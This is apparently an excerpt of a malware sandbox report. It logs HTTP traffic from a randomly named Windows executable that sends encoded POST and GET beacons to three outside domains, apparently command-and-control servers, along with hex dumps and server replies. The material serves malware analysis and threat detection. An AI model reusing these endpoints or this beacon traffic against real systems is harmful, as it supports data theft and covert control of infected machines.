                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5CiWZP2aQuL6GwgZh15xpVWcHqYFITTVrQPByKY=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.5536163.33.130.190801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:23.280239105 CEST833OUTPOST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 36 6b 58 35 51 79 5a 6a 79 38 78 7a 66 78 73 64 4e 71 31 69 65 55 76 56 39 32 59 6b 5a 2f 62 70 71 67 41 4b 30 67
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ616kX5QyZjy8xzfxsdNq1ieUvV92YkZ/bpqgAK0g
                                                        Sep 18, 2024 16:18:23.584000111 CEST833OUTPOST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 36 6b 58 35 51 79 5a 6a 79 38 78 7a 66 78 73 64 4e 71 31 69 65 55 76 56 39 32 59 6b 5a 2f 62 70 71 67 41 4b 30 67
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ616kX5QyZjy8xzfxsdNq1ieUvV92YkZ/bpqgAK0g


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.5536173.33.130.190801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:25.836359978 CEST1850OUTPOST /7xi5/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Origin: http://www.omexai.info
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.omexai.info/7xi5/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 50 42 4f 48 49 30 6e 55 74 79 6e 44 75 51 64 37 6b 33 42 55 71 62 35 77 7a 70 7a 4e 35 63 2f 52 57 72 6d 77 39 42 61 31 4e 7a 5a 49 6d 75 48 76 70 76 69 6b 44 47 6c 56 37 62 7a 43 30 74 43 4b 32 69 6d 59 66 33 5a 5a 44 31 32 4e 45 2f 52 38 62 63 64 62 7a 65 72 46 6a 62 61 31 66 63 74 52 43 39 43 41 44 65 6b 4f 34 35 42 76 53 30 2b 2b 68 36 47 52 32 4a 6f 50 49 69 67 32 75 41 45 42 47 37 4c 77 58 79 34 51 41 45 6d 32 51 76 55 58 79 67 41 59 67 76 2b 65 2f 71 70 76 56 45 78 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoPBOHI0nUtynDuQd7k3BUqb5wzpzN5c/RWrmw9Ba1NzZImuHvpvikDGlV7bzC0tCK2imYf3ZZD12NE/R8bcdbzerFjba1fctRC9CADekO45BvS0++h6GR2JoPIig2uAEBG7LwXy4QAEm2QvUXygAYgv+e/qpvVEx2W9AfklD5W/jKcCk4WRbYd6qkIYV6+iXO/k7ZQ7+85PB+faC5FhYCHvabyN4Dq2tHidCT1YEkPTApS1a68zjTuimtQRtow0BW5loSkJjGTYtRL5+RyTnNtC23vXs1FOc23gZAK52Jc1qb3kJyilVA4FesR/uHV5UQdX8k6trTz/hv91eZxL9c2ce2gOl3ay7dKbWdEdThS9jAU+fHKBbuccgmqFOb54wLoKfmFT+RSaLh1o9noqAu3/AiKdwR1a/Qf3pzDEfaK0uTnmCh4mwS8u+JSYoYHYbrfeqx/MEWAUDWD3dQD9jyvt04YpzPDAOtn2ayckXBJy+Q2f1MzvQHh05nlEHbiNgeO9zFfWSXtazk3kZWJ9FGg6ko3hkUkiuaizzt8ODK5mToNovOLZ7oSlx9XEe7g3hr6GYGGYIqMpo2aq+lvmpuAi9rdMdtkC62lvo10tq4yA32DiOMu5T68NlJMWpv/pXlui8ZfnmoTSlNm5KsFrPCuAEb1Y/9klKVJVuWANAL5a5v6+rKKIzn91jgPGSR6/xg8L51sIn7gqNG5Wngq0GfNfnr/2XDtMyxX9m6phi4a3PcMI5cRidD8IdsMQm56MUPf7/6zJTqaq+61GIMceq0cLjjOcm1FCfZeGykvrH69J/eO2iNjp6oqocVCuRBMOmiW [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.5536183.33.130.190801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:28.402077913 CEST560OUTGET /7xi5/?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.omexai.info
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:18:29.914180040 CEST410INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Wed, 18 Sep 2024 14:18:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 270
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 30 77 48 6f 4a 38 58 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 2b 52 5a 38 4a 75 61 5a 44 59 2f 2f 51 56 47 6f 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 4e 54 2f 75 4c 43 44 74 35 6e 48 59 34 5a 31 61 69 44 73 47 48 2f 6c 55 72 61 32 74 5a 34 45 6d 51 6d 4a 4a 41 41 68 38 6f 37 73 66 58 51 3d 3d 26 32 56 44 6c 4a 3d 5a 32 56 64 68 54 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x0wHoJ8X=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELNT/uLCDt5nHY4Z1aiDsGH/lUra2tZ4EmQmJJAAh8o7sfXQ==&2VDlJ=Z2VdhTx"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.553619172.191.244.62801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:35.423499107 CEST813OUTPOST /fpzw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.tekilla.wtf
                                                        Origin: http://www.tekilla.wtf
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 61 68 6b 2f 64 31 37 59 77 38 79 78 6c 6e 38 63 6a 52 2f 57 4d 32 4e 34 34 38 51 6e 69 6b 59 34 4c 73 50 77 33 37 30 3d
                                                        Data Ascii: x0wHoJ8X=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAahk/d17Yw8yxln8cjR/WM2N448QnikY4LsPw370=
                                                        Sep 18, 2024 16:18:35.831392050 CEST195INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 18 Sep 2024 14:18:35 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.553620172.191.244.62801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:37.999349117 CEST833OUTPOST /fpzw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.tekilla.wtf
                                                        Origin: http://www.tekilla.wtf
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 68 41 6f 76 59 51 7a 55 35 52 52 50 66 41 70 73 6a 73 37 61 47 7a 63 77 76 39 73 4c 65 5a 69 33 64 68 65 53 59 62
                                                        Data Ascii: x0wHoJ8X=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWhAovYQzU5RRPfApsjs7aGzcwv9sLeZi3dheSYb
                                                        Sep 18, 2024 16:18:38.680747032 CEST195INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 18 Sep 2024 14:18:38 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.553621172.191.244.62801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:40.541198969 CEST1850OUTPOST /fpzw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.tekilla.wtf
                                                        Origin: http://www.tekilla.wtf
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 71 6b 38 33 6b 79 67 69 76 79 63 41 35 6b 6c 76 38 43 6c 42 78 53 53 2b 7a 68 74 73 2b 4e 38 2b 43 74 53 48 37 72 67 71 65 63 33 42 74 45 55 79 4a 76 34 4a 44 41 50 34 73 56 32 6f 53 37 47 68 61 59 68 77 34 61 44 53 4f 53 6f 44 4f 44 57 34 36 73 31 49 30 6d 52 4d 53 35 33 63 6a 69 33 63 67 62 46 34 57 43 36 69 67 4b 58 4c 59 76 50 65 4f 30 56 59 58 74 36 30 53 2b 57 67 2b 67 48 68 43 4f 2b 77 34 31 41 45 2b 2f 30 4a 64 6b 6d 75 7a 48 6e 67 31 57 69 74 7a 63 72 39 72 51 2f [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExjmXNeNj6AyhEcWClwU0ba0HXFcf45JZ8QtCQOSY04fC4JDGP6wE1Kpdd5aNs5dWJc3V0t0ARE7ulOouIZhhE3eKVZyuodydekIPer9RTsqmYQ+4NlpcSjekRT4RXkOjhcqk83kygivycA5klv8ClBxSS+zhts+N8+CtSH7rgqec3BtEUyJv4JDAP4sV2oS7GhaYhw4aDSOSoDODW46s1I0mRMS53cji3cgbF4WC6igKXLYvPeO0VYXt60S+Wg+gHhCO+w41AE+/0JdkmuzHng1Witzcr9rQ/zYVBNHBaOWphyr1CjjrfhMdNdOZtvLdPnxiIOCWifVdAS+9avR69PrpiP3og+/C3eOixHriMiJa3B6Xn4/jLYIFxfqWkXXNxzSEUuCZVK4gKO50tdQBBKTIvXpWMNuj2XpfyLS8oWtStL7U+6D42sFXOvYoGJs+RxDk5hdT6fl4JrkZP9+3ckwAvLp5v02TsNbNCuwEP9UzU9wGUSxXF44zBf88+RpYtxe80RxmdNVVhp1jXz01vTf7YyUd+5kbmnGQT4YzQGrXbDUxItWatlxiFH54jgb5AVVNlrj6ZzOM2lEbbHdf5Q/mCxjkgyIJEnOD4o2W/yc08HEaJp4piYXUes2Gj9rskQTlSBSQ8GtrO7JzhEzsr7Rnsb1JhPnFT5uGU9aB8qQ0uImgKrpy2T1U6PspqTtfUltmEn5rqfwrRYfKYtfrVeyVxCyn0M9vs8NRAwZVwD/TxVC94VM/KJoSbbtH0FCsTCCGxBrK4Hqm/xVXGQBxQPzyN4S2IPs7PojUPTjle8WhcnJxKm5i+fU+58/eb/Q6jPyBwaFwEvHMS93KYV5uPAq/ib/IZmUzqxFx0M2gMOzf9CppCmWWLczTkOwljAp9ZHd7qynwgzB+/pVHV/+UvNftIe07CFGXLY9ozCdGyFV8PdimV4C5f5ByrFq69qDgj89 [TRUNCATED]
                                                        Sep 18, 2024 16:18:41.007587910 CEST195INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 18 Sep 2024 14:18:40 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.553622172.191.244.62801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:43.088589907 CEST560OUTGET /fpzw/?2VDlJ=Z2VdhTx&x0wHoJ8X=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyV8YvjGskVquY7O4GS1YJERNPT4cclYTval7UCV/4UAiTeAA== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.tekilla.wtf
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:18:43.557492971 CEST195INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 18 Sep 2024 14:18:43 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.553623172.96.191.39801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:18:48.856637955 CEST822OUTPOST /3qit/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.bola88site.one
                                                        Origin: http://www.bola88site.one
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.bola88site.one/3qit/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 72 31 69 64 6b 78 54 37 76 4e 67 36 55 69 58 51 79 74 6d 74 52 54 77 59 35 46 37 78 71 2b 56 65 42 6b 53 68 66 63 3d
                                                        Data Ascii: x0wHoJ8X=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUr1idkxT7vNg6UiXQytmtRTwY5F7xq+VeBkShfc=
                                                        Sep 18, 2024 16:18:49.783720970 CEST1033INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 796
                                                        date: Wed, 18 Sep 2024 14:18:49 GMT
                                                        server: LiteSpeed
